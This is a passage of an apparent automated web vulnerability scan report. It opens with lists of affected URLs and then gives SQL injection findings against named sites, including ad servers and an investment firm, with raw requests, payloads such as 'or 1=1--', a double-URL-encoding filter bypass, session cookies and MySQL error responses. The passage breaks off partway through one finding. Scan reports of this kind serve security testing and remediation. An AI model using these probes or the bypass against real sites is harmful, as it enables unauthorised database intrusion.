16.167. http://www.wired.com/threatlevel/category/the-ridiculous/

16.168. http://www.wired.com/threatlevel/category/threats/

16.169. http://www.wired.com/threatlevel/category/three-strikes/

16.170. http://www.wired.com/threatlevel/category/tsa/

16.171. http://www.wired.com/threatlevel/category/uncategorized/

16.172. http://www.wired.com/threatlevel/category/watchlists/

16.173. http://www.wired.com/threatlevel/category/wikileaks/

16.174. http://www.wired.com/threatlevel/category/yo-ho-ho/

16.175. http://www.wired.com/threatlevel/tag/4chan/

16.176. http://www.wired.com/threatlevel/tag/aclu/

16.177. http://www.wired.com/threatlevel/tag/al-haramain/

16.178. http://www.wired.com/threatlevel/tag/albert-gonzalez/

16.179. http://www.wired.com/threatlevel/tag/apple-iphone/

16.180. http://www.wired.com/threatlevel/tag/blackhat/

16.181. http://www.wired.com/threatlevel/tag/bradley-manning/

16.182. http://www.wired.com/threatlevel/tag/carding/

16.183. http://www.wired.com/threatlevel/tag/ccc/

16.184. http://www.wired.com/threatlevel/tag/censorship/

16.185. http://www.wired.com/threatlevel/tag/china/

16.186. http://www.wired.com/threatlevel/tag/copyright/

16.187. http://www.wired.com/threatlevel/tag/crime/

16.188. http://www.wired.com/threatlevel/tag/defcon/

16.189. http://www.wired.com/threatlevel/tag/dmca/

16.190. http://www.wired.com/threatlevel/tag/facebook/

16.191. http://www.wired.com/threatlevel/tag/fbi/

16.192. http://www.wired.com/threatlevel/tag/file-sharing/

16.193. http://www.wired.com/threatlevel/tag/first-amendment/

16.194. http://www.wired.com/threatlevel/tag/google/

16.195. http://www.wired.com/threatlevel/tag/hack/

16.196. http://www.wired.com/threatlevel/tag/hacking/

16.197. http://www.wired.com/threatlevel/tag/intellectual-property/

16.198. http://www.wired.com/threatlevel/tag/mpaa/

16.199. http://www.wired.com/threatlevel/tag/nsa/

16.200. http://www.wired.com/threatlevel/tag/obama/

16.201. http://www.wired.com/threatlevel/tag/piracy/

16.202. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

16.203. http://www.wired.com/threatlevel/tag/pirate-bay/

16.204. http://www.wired.com/threatlevel/tag/politics/

16.205. http://www.wired.com/threatlevel/tag/privacy/

16.206. http://www.wired.com/threatlevel/tag/riaa/

16.207. http://www.wired.com/threatlevel/tag/segvec/

16.208. http://www.wired.com/threatlevel/tag/supreme-court/

16.209. http://www.wired.com/threatlevel/tag/surveillance/

16.210. http://www.wired.com/threatlevel/tag/tjx/

16.211. http://www.wired.com/threatlevel/tag/tsa/

16.212. http://www.wired.com/threatlevel/tag/twitter/

16.213. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

16.214. http://www.wired.com/threatlevel/tag/wikileaks/

16.215. http://www.wired.com/topics/Claude_Cassirer

16.216. http://www.wired.com/topics/Florida

16.217. http://www.wired.com/topics/Spain

16.218. http://www.wired.com/topics/United_States

16.219. http://www.wired.com/topics/Western_Europe

16.220. http://www.wired.com/topics/WikiLeaks.org

16.221. http://www.wired.com/underwire/

16.222. http://www.wired.com/video/

16.223. http://www.wired.com/video/search/

16.224. http://www.wired.com/wiredscience/

16.225. http://www.zdnet.com/

17. TRACE method is enabled

17.1. http://ad.crwdcntrl.net/

17.2. http://www.sentinelinvestments.com/

17.3. http://www.washingtonpost.com/

17.4. http://www.websitedescription.com/

18. Email addresses disclosed

18.1. http://dean.edwards.name/weblog/2006/03/base/

18.2. http://landesm.gfi.com/event-log-analysis-sm/

18.3. http://lists.arin.net/mailman/listinfo/arin-whoisrws

18.4. http://www.ccmaine.net/ContactUs

18.5. http://www.pwc.com/WTS/WebTrendsServlet.js

18.6. http://www.pwc.com/en_GX/webadmin/assets/script/activatedlogo.js

18.7. http://www.sentinelinvestments.com/inc/js/jquery.cookie.js

18.8. http://www.sentinelinvestments.com/inc/js/jquery.hoverIntent.minified.js

18.9. http://www.sentinelinvestments.com/inc/js/jquery.tablesorter.js

18.10. http://www.sentinelinvestments.com/inc/js/lightbox/scripts/prototype.js

18.11. http://www.tukui.org/v2/tukloadx-mac-os-auto-update/

18.12. http://www.tukui.org/v2/tukui/contact/

18.13. http://www.wired.com/about/faq/

18.14. http://www.wired.com/about/press/

18.15. http://www.wired.com/about/privacy-policy/

18.16. http://www.wired.com/about/user-agreement/

18.17. http://www.wired.com/autopia/

18.18. http://www.wired.com/autopia/2011/01/study-renewable-fuel-mandate-cant-be-met-with-ethanol/

18.19. http://www.wired.com/dangerroom/

18.20. http://www.wired.com/dangerroom/2011/01/china-is-loving-u-s-s-stealth-jet-missile-freakouts/

18.21. http://www.wired.com/epicenter/

18.22. http://www.wired.com/epicenter/2011/01/amazon-prepares-to-take-on-illinois-in-sales-tax-dispute/

18.23. http://www.wired.com/epicenter/2011/01/metropcs-net-neutrality/

18.24. http://www.wired.com/gadgetlab/

18.25. http://www.wired.com/gamelife/

18.26. http://www.wired.com/geekdad/

18.27. http://www.wired.com/geekdad/2011/01/beans-soda-same-difference-a-jelly-belly-experiment/

18.28. http://www.wired.com/js/videos/MobileCompatibility.js

18.29. http://www.wired.com/magazine/decode/

18.30. http://www.wired.com/playbook/

18.31. http://www.wired.com/rawfile/

18.32. http://www.wired.com/thisdayintech/

18.33. http://www.wired.com/threatlevel/

18.34. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/

18.35. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/

18.36. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/

18.37. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

18.38. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/

18.39. http://www.wired.com/threatlevel/2011/01/codebreakers-death/

18.40. http://www.wired.com/threatlevel/2011/01/dubai-assassination/

18.41. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/

18.42. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/

18.43. http://www.wired.com/threatlevel/2011/01/video-poker/

18.44. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/

18.45. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

18.46. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

18.47. http://www.wired.com/threatlevel/author/kimzetter/

18.48. http://www.wired.com/threatlevel/category/announcements/

18.49. http://www.wired.com/threatlevel/category/atm-hacking/

18.50. http://www.wired.com/threatlevel/category/bittorrent/

18.51. http://www.wired.com/threatlevel/category/black-hat-conference/

18.52. http://www.wired.com/threatlevel/category/bradley-manning/

18.53. http://www.wired.com/threatlevel/category/breaches/

18.54. http://www.wired.com/threatlevel/category/censorship/

18.55. http://www.wired.com/threatlevel/category/chaos-computer-club/

18.56. http://www.wired.com/threatlevel/category/conferences/

18.57. http://www.wired.com/threatlevel/category/copyrights-and-patents/

18.58. http://www.wired.com/threatlevel/category/coverups/

18.59. http://www.wired.com/threatlevel/category/crime/

18.60. http://www.wired.com/threatlevel/category/crypto/

18.61. http://www.wired.com/threatlevel/category/cybarmageddon/

18.62. http://www.wired.com/threatlevel/category/cyber-warfare/

18.63. http://www.wired.com/threatlevel/category/cyberbullying/

18.64. http://www.wired.com/threatlevel/category/cybersecurity/

18.65. http://www.wired.com/threatlevel/category/defcon/

18.66. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/

18.67. http://www.wired.com/threatlevel/category/e-voting/

18.68. http://www.wired.com/threatlevel/category/elections/

18.69. http://www.wired.com/threatlevel/category/fed-blotter/

18.70. http://www.wired.com/threatlevel/category/glitches-and-bugs/

18.71. http://www.wired.com/threatlevel/category/hacks-and-cracks/

18.72. http://www.wired.com/threatlevel/category/hans-reiser-trial/

18.73. http://www.wired.com/threatlevel/category/identification/

18.74. http://www.wired.com/threatlevel/category/intellectual-property/

18.75. http://www.wired.com/threatlevel/category/lori-drew-trial/

18.76. http://www.wired.com/threatlevel/category/network-neutrality/

18.77. http://www.wired.com/threatlevel/category/nsa/

18.78. http://www.wired.com/threatlevel/category/openleaks/

18.79. http://www.wired.com/threatlevel/category/politics/

18.80. http://www.wired.com/threatlevel/category/porn/

18.81. http://www.wired.com/threatlevel/category/privacy/

18.82. http://www.wired.com/threatlevel/category/rfid/

18.83. http://www.wired.com/threatlevel/category/riaa-litigation/

18.84. http://www.wired.com/threatlevel/category/rsa-conference/

18.85. http://www.wired.com/threatlevel/category/sexting/

18.86. http://www.wired.com/threatlevel/category/spooks-gone-wild/

18.87. http://www.wired.com/threatlevel/category/stuxnet/

18.88. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/

18.89. http://www.wired.com/threatlevel/category/surveillance/

18.90. http://www.wired.com/threatlevel/category/the-courts/

18.91. http://www.wired.com/threatlevel/category/the-ridiculous/

18.92. http://www.wired.com/threatlevel/category/threats/

18.93. http://www.wired.com/threatlevel/category/three-strikes/

18.94. http://www.wired.com/threatlevel/category/tsa/

18.95. http://www.wired.com/threatlevel/category/uncategorized/

18.96. http://www.wired.com/threatlevel/category/watchlists/

18.97. http://www.wired.com/threatlevel/category/wikileaks/

18.98. http://www.wired.com/threatlevel/category/yo-ho-ho/

18.99. http://www.wired.com/threatlevel/tag/4chan/

18.100. http://www.wired.com/threatlevel/tag/aclu/

18.101. http://www.wired.com/threatlevel/tag/al-haramain/

18.102. http://www.wired.com/threatlevel/tag/albert-gonzalez/

18.103. http://www.wired.com/threatlevel/tag/apple-iphone/

18.104. http://www.wired.com/threatlevel/tag/blackhat/

18.105. http://www.wired.com/threatlevel/tag/bradley-manning/

18.106. http://www.wired.com/threatlevel/tag/carding/

18.107. http://www.wired.com/threatlevel/tag/ccc/

18.108. http://www.wired.com/threatlevel/tag/censorship/

18.109. http://www.wired.com/threatlevel/tag/china/

18.110. http://www.wired.com/threatlevel/tag/copyright/

18.111. http://www.wired.com/threatlevel/tag/crime/

18.112. http://www.wired.com/threatlevel/tag/defcon/

18.113. http://www.wired.com/threatlevel/tag/dmca/

18.114. http://www.wired.com/threatlevel/tag/facebook/

18.115. http://www.wired.com/threatlevel/tag/fbi/

18.116. http://www.wired.com/threatlevel/tag/file-sharing/

18.117. http://www.wired.com/threatlevel/tag/first-amendment/

18.118. http://www.wired.com/threatlevel/tag/google/

18.119. http://www.wired.com/threatlevel/tag/hack/

18.120. http://www.wired.com/threatlevel/tag/hacking/

18.121. http://www.wired.com/threatlevel/tag/intellectual-property/

18.122. http://www.wired.com/threatlevel/tag/mpaa/

18.123. http://www.wired.com/threatlevel/tag/nsa/

18.124. http://www.wired.com/threatlevel/tag/obama/

18.125. http://www.wired.com/threatlevel/tag/piracy/

18.126. http://www.wired.com/threatlevel/tag/pirate-bay-trial/

18.127. http://www.wired.com/threatlevel/tag/pirate-bay/

18.128. http://www.wired.com/threatlevel/tag/politics/

18.129. http://www.wired.com/threatlevel/tag/privacy/

18.130. http://www.wired.com/threatlevel/tag/riaa/

18.131. http://www.wired.com/threatlevel/tag/segvec/

18.132. http://www.wired.com/threatlevel/tag/supreme-court/

18.133. http://www.wired.com/threatlevel/tag/surveillance/

18.134. http://www.wired.com/threatlevel/tag/tjx/

18.135. http://www.wired.com/threatlevel/tag/tsa/

18.136. http://www.wired.com/threatlevel/tag/twitter/

18.137. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/

18.138. http://www.wired.com/threatlevel/tag/wikileaks/

18.139. http://www.wired.com/underwire/

18.140. http://www.wired.com/wiredscience/

19. Private IP addresses disclosed

19.1. http://digg.com/submit

19.2. http://download.cnet.com/8301-2007_4-20027809-12.html/

19.3. http://download.cnet.com/8618-2007_4-20027809.html

19.4. http://www.zdnet.com/

20. Robots.txt file

20.1. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

20.2. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

20.3. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink

20.4. http://adlog.com.com/adlog/i/r=10004&sg=484676&o=20%253a2007%253aB12%253a2014%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027809&pp=100&e=3&rqid=01phx1-ad-e18:4D29F45D3ECF7C&orh=packetstormsecurity.org&ort=&oepartner=&epartner=&ppartner=&pdom=packetstormsecurity.org&cpnmodule=&count=&ra=173.193.214.243&dvar=dvar%255flb%255fmpu%253d1%2523dvar%255ftag%253dSmart%2520Protection%253bparental%2520control%253bTrend%2520Micro%2523dvar%255fversion%253d2008&ucat_rsi=%2526&pg=8WzIBQoOYJAAADD4JyUAAADs&t=2011.01.09.21.57.52/http://i.i.com.com/cnwk.1d/Ads/11732/10/728x90righteousSD123.gif

20.5. http://b.scorecardresearch.com/b

20.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

20.7. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml

20.8. http://www.walmart.com/x22

20.9. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

20.10. http://www.websitedescription.com/msn.whitepages.com

21. HTML does not specify charset

21.1. http://ad.doubleclick.net/clk

21.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

21.3. http://www.pwc.com/WTS/WebTrendsServlet.js

21.4. http://www.tukui.org/v2/forums/search/

21.5. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

22. Content type incorrectly stated

22.1. http://ad.doubleclick.net/clk

22.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

22.3. http://darkblue.com/skins/lander/images/darkblue.ico

22.4. http://www.pwc.com/WTS/WebTrendsServlet.js

22.5. http://www.sentinelinvestments.com/favicon.ico

22.6. http://www.wired.com/js/ads/google_customize.js

22.7. http://www.wired.com/js/cn-fe-ads/cn.ad.lotame.js

22.8. http://www.wired.com/js/cn-fe-ads/cn.dart.js

22.9. http://www.wired.com/js/cn-fe-common/cn.js

22.10. http://www.wired.com/js/comments/commentBroker.js

22.11. http://www.wired.com/js/comments/prototype.js

22.12. http://www.wired.com/js/ecom/ecomfw.min.js

22.13. http://www.wired.com/js/global.js

22.14. http://www.wired.com/js/jquery-1.3.2.min.js

22.15. http://www.wired.com/js/omniture/s_code.js

22.16. http://www.wired.com/js/videos/MobileCompatibility.js

22.17. http://www.wired.com/js_blogs/json2.js

22.18. http://www.wired.com/js_blogs/popup.js

22.19. http://www.wired.com/threatlevel/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

22.20. http://www.wired.com/threatlevel/xmlrpc.php

23. SSL certificate



1. SQL injection
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31736172%20or%201%3d1--%20 and 31736172%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 455
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('<!-- Template ID = 2050 Template Name = CONDE HTML for GIF and JPG -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B232847109%3B0-0%3B0%3B16638913%3B255-0/0%3B39450345/39468132/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.concierge.com/tools/travelawards/readerschoice?mbid=house\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646754/CON_2010RC_728x90_.jpg\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

Request 2

GET /adj/wiredcom.dart/threatlevel?131736172%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 417
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:24:37 GMT
Expires: Wed, 12 Jan 2011 15:24:37 GMT
Connection: close

document.write('<!-- Template ID = 2050 Template Name = CONDE HTML for GIF and JPG -->\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/q%3B224881053%3B0-0%3B0%3B16638913%3B255-0/0%3B39745831/39763618/1%3B%3B%7Eaopt%3D2/0/6c/0%3B%7Esscs%3D%3fhttp://www.vf.com/app\" target=\"_blank\"><img src=\"http://s0.2mdn.net/2646749/VYF_ROS_728x90_JanApp_v3a-1.gif\" WIDTH=728 HEIGHT=90 border=\"0\"></a>\n');

1.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.uk.doubleclick.net
Path:   /adj/reg.security.4159/front

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/reg.security.4159/front%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:26:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4540

document.write('<!-- Template Id = 1 Template Name = Banner Creative (Flash) -->\n<!-- Copyright 2002 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
mage();
ML_img_ServerOnline.src='http://invitation.opinionbar.com/popups/ServerOnline.gif';
ML_img_ServerOnline.onload=ML_ImageLoaded;
ML_img_ServerOnline.onabort=ML_ImageLoaded;
ML_img_ServerOnline.onerror=ML_ImageError;

function ML_ImageLoaded()
{
function metrixlab_onready(el, func){
   this.args = new Array(el, func);
   this.doTry = function(){
       try{
           var el = eval(this.args[0]);
           el.onload =
...[SNIP]...

Request 2

GET /adj/reg.security.4159/front%2527%2527;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 12 Jan 2011 15:27:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3471

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3a8d/0/0/%2a/d;207832120;0-0;0;13489543;3454-728/90;29868129/29886006/1;;~sscs=%3fhttp://account.theregister.co.uk/regi
...[SNIP]...

1.3. http://www.sentinelinvestments.com/forms_literature.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /forms_literature.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forms_literature.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:34 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.4. http://www.sentinelinvestments.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sentinelinvestments.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 1

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Request 2

GET /index.php/1'' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response 2

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:05:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
   <l
...[SNIP]...

1.5. http://www.sentinelinvestments.com/sentinel_news_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sentinelinvestments.com
Path:   /sentinel_news_detail.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /sentinel_news_detail.php/1' HTTP/1.1
Host: www.sentinelinvestments.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=22150713.1294754867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; __utma=22150713.441323346.1294754867.1294754867.1294754867.1; __utmc=22150713; __utmb=22150713.4.10.1294754867;

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 16:04:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 150
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

1.6. http://www.websitedescription.com/msn.whitepages.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.websitedescription.com
Path:   /msn.whitepages.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

